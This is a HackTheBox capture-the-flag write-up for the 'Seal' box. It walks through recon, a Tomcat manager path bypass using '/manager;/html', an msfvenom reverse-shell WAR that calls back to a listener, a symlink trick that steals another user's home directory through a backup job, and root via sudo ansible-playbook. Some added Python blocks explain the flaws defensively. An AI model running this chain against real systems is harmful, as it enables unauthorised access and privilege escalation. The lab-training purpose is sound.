HackTheBox-Seal

admin · 2022-09-08 15:18:03 · Security Articles · 4 views · 15065 characters · reading time 50 min 13 s

title: HackTheBox-Seal
author: CrazyInSide
layout: true
categories: HackTheBox
cover: https://www.worldisend.com/img/Seal.png
tags:
  - Linux


Seal
```
CrazyInSide:~/HackTheBox$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.250
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-09-01 10:04:57 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 8080/tcp on 10.10.10.250
Discovered open port 443/tcp on 10.10.10.250
Discovered open port 22/tcp on 10.10.10.250

CrazyInSide:~/HackTheBox$ sudo nmap -sC -sV 10.10.10.250 -p8080,443,22
Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-09-01 18:09 CST
Nmap scan report for 10.10.10.250
Host is up (0.083s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4b894739673d07315e3f4c27411ff967 (RSA)
|   256 04a74f399565c5b08dd5492ed8440036 (ECDSA)
|_  256 b45e8393c54249de7125927123b18554 (ED25519)
443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)
| tls-alpn: 
|_  http/1.1
|_http-server-header: nginx/1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after:  2022-05-05T10:24:03
|_http-title: Seal Market
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg: 
|_  http/1.1
8080/tcp open  http-proxy
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Thu, 01 Sep 2022 10:10:04 GMT
|     Set-Cookie: JSESSIONID=node02q9tfbpnsxre1bm1gkv3wal0a2.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   GetRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Thu, 01 Sep 2022 10:10:03 GMT
|     Set-Cookie: JSESSIONID=node0yvbmr291moot13csk9lwzfixi0.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Thu, 01 Sep 2022 10:10:04 GMT
|     Set-Cookie: JSESSIONID=node01jub9w55x03xg1mawzh2zjn5sd1.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Allow: GET,HEAD,POST,OPTIONS
|     Content-Length: 0
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   Socks4: 
|     HTTP/1.1 400 Illegal character CNTL=0x4
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
|   Socks5: 
|     HTTP/1.1 400 Illegal character CNTL=0x5
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://ParrotOS.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.34 seconds
zsh: segmentation fault  sudo nmap -sC -sV 10.10.10.250 -p8080,443,22
```

The site has a search box, but it appears to do nothing more than call Google Maps. Port 8080 is running a GitBucket instance.


This application has a known historical vulnerability:

```
CrazyInSide:~/HackTheBox$ searchsploit GitBucket
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
GitBucket 4.23.1 - Remote Code Execution                                            | java/webapps/44668.py
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
```

However, the exploit's documentation states that it only works against Windows servers. I registered an account instead; the target probably has Tomcat deployed, and in the commit history of the tomcat repository a set of credentials can be found.

```
username="tomcat" password="42MrHBf*z8{Z%"
```

I started directory enumeration on port 80:

```
CrazyInSide:~/HackTheBox$ dirsearch -u https://seal.htb/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/crazyinside/.dirsearch/reports/seal.htb/-_22-09-01_18-51-03.txt

Error Log: /home/crazyinside/.dirsearch/logs/errors-22-09-01_18-51-03.log

Target: https://seal.htb/

[18:51:04] Starting: 
[18:51:05] 302 -    0B  - /js  ->  http://seal.htb/js/
[18:51:31] 400 -  804B  - /..................etcpasswd
[18:51:33] 400 -  804B  - /a%5c.aspx
[18:51:36] 302 -    0B  - /admin  ->  http://seal.htb/admin/
[18:52:05] 302 -    0B  - /css  ->  http://seal.htb/css/
[18:52:15] 403 -  564B  - /host-manager/html
[18:52:16] 302 -    0B  - /host-manager/  ->  http://seal.htb/host-manager/html
[18:52:16] 302 -    0B  - /icon  ->  http://seal.htb/icon/
[18:52:16] 302 -    0B  - /images  ->  http://seal.htb/images/
[18:52:18] 200 -   19KB - /index.html
[18:52:26] 302 -    0B  - /manager  ->  http://seal.htb/manager/
[18:52:26] 403 -  564B  - /manager/html
[18:52:26] 302 -    0B  - /manager/  ->  http://seal.htb/manager/html
[18:52:26] 403 -  564B  - /manager/html/
[18:52:26] 401 -    2KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage
[18:52:26] 401 -    2KB - /manager/jmxproxy
[18:52:26] 401 -    2KB - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY
[18:52:26] 401 -    2KB - /manager/status/all
[18:52:26] 401 -    2KB - /manager/jmxproxy/?qry=STUFF
[18:52:26] 401 -    2KB - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
[18:52:26] 401 -    2KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage&key=used
[18:52:26] 401 -    2KB - /manager/jmxproxy/?set=Catalina%3Atype%3DValve%2Cname%3DErrorReportValve%2Chost%3Dlocalhost&att=debug&val=cow
[18:52:26] 401 -    2KB - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE
[18:52:26] 401 -    2KB - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS

Task Completed
```

The site appears to be running Tomcat, since http://seal.htb/manager/html is Tomcat's default manager path. But why is it redirecting to plain http? I started going through the nginx configuration file:


These locations require the client to present a certificate; if the check passes, the request is proxied to port 8000 on the target. The path check is easy to bypass, because it only matches the literal /manager/html. Requesting /manager;/html instead gets past it, after which I can log in with the Tomcat credentials found earlier.

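The mismatch above is a classic parser differential: nginx matches its location prefix against the URI as it received it, while Tomcat strips `;name=value` path parameters from every segment before mapping the request, so `/manager;/html` and `/manager/html` reach the same servlet. The following is an added example (not code from the original post or from the box) that approximates Tomcat's normalisation and shows why an access decision has to be made on that canonical form rather than on the raw URI; the protected prefixes are assumed from the two paths that returned 403 in the dirsearch output.

```python
from urllib.parse import unquote
import posixpath

# Assumed from the dirsearch output above: the locations nginx guards with a client certificate.
PROTECTED_PREFIXES = ("/manager/html", "/host-manager/html")


def tomcat_normalize(path: str) -> str:
    """Approximate the request path as Tomcat maps it to a servlet.

    Tomcat treats ';name=value' inside a segment as a path parameter (the
    ';jsessionid=' mechanism) and drops it before mapping, so '/manager;/html'
    maps exactly like '/manager/html'. Percent-encoding and '.', '..', '//'
    are resolved as well.
    """
    decoded = unquote(path)
    segments = [seg.split(";", 1)[0] for seg in decoded.split("/")]
    normalized = posixpath.normpath("/".join(segments))
    if decoded.endswith("/") and not normalized.endswith("/"):
        normalized += "/"
    return normalized


def nginx_prefix_match(raw_path: str) -> bool:
    """The weak check the post describes: a prefix match on the URI nginx sees.
    nginx does not strip Tomcat-style ';' path parameters, so the literal
    prefix '/manager/html' never matches '/manager;/html'."""
    return raw_path.startswith(PROTECTED_PREFIXES)


def requires_client_cert(raw_path: str) -> bool:
    """Hardened check: decide on the path the backend will actually map."""
    return tomcat_normalize(raw_path).startswith(PROTECTED_PREFIXES)


if __name__ == "__main__":
    for p in ("/manager/html", "/manager;/html", "/index.html"):
        print(f"{p:16} nginx-style={nginx_prefix_match(p)!s:5} "
              f"canonical={tomcat_normalize(p)} hardened={requires_client_cert(p)}")
```

The durable fix is to stop relying on a front-end prefix match at all: either do not expose the manager application through nginx, or let Tomcat itself enforce the client-certificate requirement on the path it has already canonicalised.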

Generate a WAR package and deploy it with one click through the Tomcat manager:

```
CrazyInSide:~/HackTheBox$ msfvenom -p java/shell_reverse_tcp lhost=10.10.16.6 lport=1337 -f war -o test.war
Payload size: 13316 bytes
Final size of war file: 13316 bytes
Saved as: test.war
CrazyInSide:~/HackTheBox$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.250] 43076
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
script -qc /bin/bash /dev/null
tomcat@seal:/var/lib/tomcat9$ 
```

There is a backups folder under /opt:

```
tomcat@seal:/opt/backups$ ls
archives  playbook
tomcat@seal:/opt/backups$ cd archives/
tomcat@seal:/opt/backups/archives$ ls
backup-2022-09-01-12:30:32.gz  backup-2022-09-01-12:31:33.gz
tomcat@seal:/opt/backups/archives$ cat ../playbook/run.yml 
- hosts: localhost
  tasks:
  - name: Copy Files
    synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
  - name: Server Backups
    archive:
      path: /opt/backups/files/
      dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"
  - name: Clean
    file:
      state: absent
      path: /opt/backups/files/
tomcat@seal:/opt/backups/archives$ 
```

It looks like a scheduled task periodically archives /var/lib/tomcat9/webapps/ROOT/admin/dashboard into the backup directory.

```
tomcat@seal:/opt/backups/archives$ ls -all
total 2968
drwxrwxr-x 2 luis luis   4096 Sep  1 12:34 .
drwxr-xr-x 4 luis luis   4096 Sep  1 12:34 ..
-rw-rw-r-- 1 luis luis 606047 Sep  1 12:30 backup-2022-09-01-12:30:32.gz
-rw-rw-r-- 1 luis luis 606047 Sep  1 12:31 backup-2022-09-01-12:31:33.gz
-rw-rw-r-- 1 luis luis 606047 Sep  1 12:32 backup-2022-09-01-12:32:33.gz
-rw-rw-r-- 1 luis luis 606047 Sep  1 12:33 backup-2022-09-01-12:33:33.gz
-rw-rw-r-- 1 luis luis 606047 Sep  1 12:34 backup-2022-09-01-12:34:33.gz
tomcat@seal:/opt/backups/archives$ 
```

The archives are owned by the luis user, and the uploads directory is world readable, writable and executable:

```
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ ls -all
total 100
drwxr-xr-x 7 root root  4096 May  7  2021 .
drwxr-xr-x 3 root root  4096 May  6  2021 ..
drwxr-xr-x 5 root root  4096 Mar  7  2015 bootstrap
drwxr-xr-x 2 root root  4096 Mar  7  2015 css
drwxr-xr-x 4 root root  4096 Mar  7  2015 images
-rw-r--r-- 1 root root 71744 May  6  2021 index.html
drwxr-xr-x 4 root root  4096 Mar  7  2015 scripts
drwxrwxrwx 2 root root  4096 May  7  2021 uploads
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ ln -s /home/luis /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads
```

I link it to luis's home directory. After a while a much larger backup appears:

```
tomcat@seal:/opt/backups/archives$ ls -all
total 113612
drwxrwxr-x 2 luis luis      4096 Sep  1 12:36 .
drwxr-xr-x 4 luis luis      4096 Sep  1 12:36 ..
-rw-rw-r-- 1 luis luis    606047 Sep  1 12:35 backup-2022-09-01-12:35:33.gz
-rw-rw-r-- 1 luis luis 115723773 Sep  1 12:36 backup-2022-09-01-12:36:32.gz
tomcat@seal:/opt/backups/archives$ cp backup-2022-09-01-12:36:32.gz /tmp
tomcat@seal:/opt/backups/archives$ cd /tmp
tomcat@seal:/tmp$ tar xf backup-2022-09-01-12:36:32.gz --force-local
tomcat@seal:/tmp$ ls
backup-2022-09-01-12:30:32.gz  dashboard          pwk.py       tmpypck0ak1
backup-2022-09-01-12:36:32.gz  hsperfdata_tomcat  tmp7e2a49nn
tomcat@seal:/tmp$ ls -all
total 113636
drwxrwxrwt  6 root   root        4096 Sep  1 12:38 .
drwxr-xr-x 20 root   root        4096 Jul 26  2021 ..
-rw-r-----  1 tomcat tomcat    606047 Sep  1 12:30 backup-2022-09-01-12:30:32.gz
-rw-r-----  1 tomcat tomcat 115723773 Sep  1 12:37 backup-2022-09-01-12:36:32.gz
drwxr-x---  7 tomcat tomcat      4096 May  7  2021 dashboard
drwxr-x---  2 tomcat tomcat      4096 Sep  1 10:00 hsperfdata_tomcat
-rw-r-----  1 tomcat tomcat      3448 Sep  1 12:23 pwk.py
drwx------  4 tomcat tomcat      4096 Sep  1 12:24 tmp7e2a49nn
drwx------  4 tomcat tomcat      4096 Sep  1 12:24 tmpypck0ak1
tomcat@seal:/tmp$ cd dashboard/
tomcat@seal:/tmp/dashboard/uploads/luis$ ls -all
total 51320
drwxr-x--- 9 tomcat tomcat     4096 May  7  2021 .
drwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 ..
drwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .ansible
-rw-r----- 1 tomcat tomcat      220 May  5  2021 .bash_logout
-rw-r----- 1 tomcat tomcat     3797 May  5  2021 .bashrc
drwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .cache
drwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .config
drwxr-x--- 7 tomcat tomcat     4096 Sep  1 12:38 .gitbucket
-rw-r----- 1 tomcat tomcat 52497951 Jan 14  2021 gitbucket.war
drwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .java
drwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .local
-rw-r----- 1 tomcat tomcat      807 May  5  2021 .profile
drwx------ 2 tomcat tomcat     4096 Sep  1 12:38 .ssh
-r-------- 1 tomcat tomcat       33 Sep  1 10:00 user.txt
tomcat@seal:/tmp/dashboard/uploads/luis$ cat user.txt 
98f4bf24..............................
```
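The backup job above copies with `copy_links=yes`, so any symlink planted in the world-writable uploads/ directory is dereferenced and its target ends up in an archive readable by the tomcat user. Here is an added example (not from the original post or the box) of the pre-flight check a backup job should run: walk the source tree without following links and refuse any symlink whose resolved target lies outside the tree. It constructs a throwaway copy of the layout from the post (dashboard/, a 777 uploads/, a link to a home directory with a placeholder key) in a temporary directory; all paths and file contents are constructed for the demo.

```python
import os
import tempfile


def find_escaping_symlinks(src_root: str):
    """Return (link, resolved_target) for every symlink below src_root whose
    target lies outside src_root.

    Ansible's synchronize with copy_links=yes (rsync -L) follows links and
    copies what they point to, so one link in a world-writable subdirectory
    drags foreign files into the archive. os.walk does not descend into
    symlinked directories by default, so the scan itself cannot be redirected.
    """
    root = os.path.realpath(src_root)
    escaping = []
    for dirpath, dirnames, filenames in os.walk(src_root):
        for name in dirnames + filenames:
            entry = os.path.join(dirpath, name)
            if not os.path.islink(entry):
                continue
            target = os.path.realpath(entry)
            if os.path.commonpath([root, target]) != root:
                escaping.append((entry, target))
    return escaping


def build_demo_tree():
    """Constructed layout mirroring the box: a dashboard tree whose
    world-writable uploads/ holds a link to a home directory outside it."""
    base = tempfile.mkdtemp(prefix="seal-demo-")
    home = os.path.join(base, "home", "luis")
    os.makedirs(os.path.join(home, ".ssh"))
    with open(os.path.join(home, ".ssh", "id_rsa"), "w") as fh:
        fh.write("constructed placeholder, not a real key\n")
    dashboard = os.path.join(base, "dashboard")
    uploads = os.path.join(dashboard, "uploads")
    os.makedirs(uploads)
    with open(os.path.join(dashboard, "index.html"), "w") as fh:
        fh.write("<html></html>\n")
    os.chmod(uploads, 0o777)
    os.symlink(home, os.path.join(uploads, "luis"))  # what the ln -s above did
    return dashboard, home


def audit_demo():
    """Run the check on the constructed tree; returns each offending link
    relative to the source root and whether it resolves to the planted home."""
    dashboard, home = build_demo_tree()
    hits = find_escaping_symlinks(dashboard)
    return [(os.path.relpath(link, dashboard), target == os.path.realpath(home))
            for link, target in hits]


if __name__ == "__main__":
    for rel, to_home in audit_demo():
        print(f"refusing backup: {rel} points outside the source tree (home dir: {to_home})")
```

At copy time the same property can be enforced by rsync's `--safe-links` option (passed through synchronize's `rsync_opts`), which skips symlinks that point outside the transferred tree; the application-level root causes, a world-writable directory inside a root-owned web root and a backup that runs as a more privileged user, still need fixing.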

There is a user SSH key:

```
tomcat@seal:/tmp/dashboard/uploads/luis/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub
tomcat@seal:/tmp/dashboard/uploads/luis/.ssh$ cat id_rsa
CrazyInSide:~/HackTheBox$ ssh -i id_rsa luis@10.10.10.250    
The authenticity of host '10.10.10.250 (10.10.10.250)' can't be established.
ED25519 key fingerprint is SHA256:CK0IgtHX4isQwWAPna6oD88DnRAM9OacxQExxLSnlL0.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.250' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 01 Sep 2022 12:41:22 PM UTC

  System load:  0.29              Processes:             165
  Usage of /:   49.2% of 9.58GB   Users logged in:       0
  Memory usage: 30%               IPv4 address for eth0: 10.10.10.250
  Swap usage:   0%

 * Pure upstream Kubernetes 1.21, smallest, simplest cluster ops!
     https://microk8s.io/

22 updates can be applied immediately.
15 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri May  7 07:00:18 2021 from 10.10.14.2
luis@seal:~$ 
luis@seal:~$ sudo -l
Matching Defaults entries for luis on seal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User luis may run the following commands on seal:
    (ALL) NOPASSWD: /usr/bin/ansible-playbook *
luis@seal:~$ cat run.yml 
- hosts: localhost
  tasks:
  - name: cat
    shell: cat /root/root.txt > flag.txt
    register: out
  - name: stdout
    debug: msg=""
  - name: stderr
    debug: msg=""
luis@seal:~$ sudo /usr/bin/ansible-playbook run.yml 
[WARNING]: provided hosts list is empty, only localhost is available. Note that the implicit localhost does not match 'all'

PLAY [localhost] ***************************************************************

TASK [Gathering Facts] *********************************************************
ok: [localhost]

TASK [cat] *********************************************************************
changed: [localhost]

TASK [stdout] ******************************************************************
ok: [localhost] => {
    "msg": ""
}

TASK [stderr] ******************************************************************
ok: [localhost] => {
    "msg": ""
}

PLAY RECAP *********************************************************************
localhost                  : ok=4    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

luis@seal:~$ ls
flag.txt  gitbucket.war  run.yml  user.txt
luis@seal:~$ cat flag.txt 
9b0c..............................
luis@seal:~$ 
```

Published on 2022-09-08 15:18:03. Please keep this link when reposting (CN-SEC: thanks to the original author for their work): HackTheBox-Seal http://cn-sec.com/archives/1283945.html
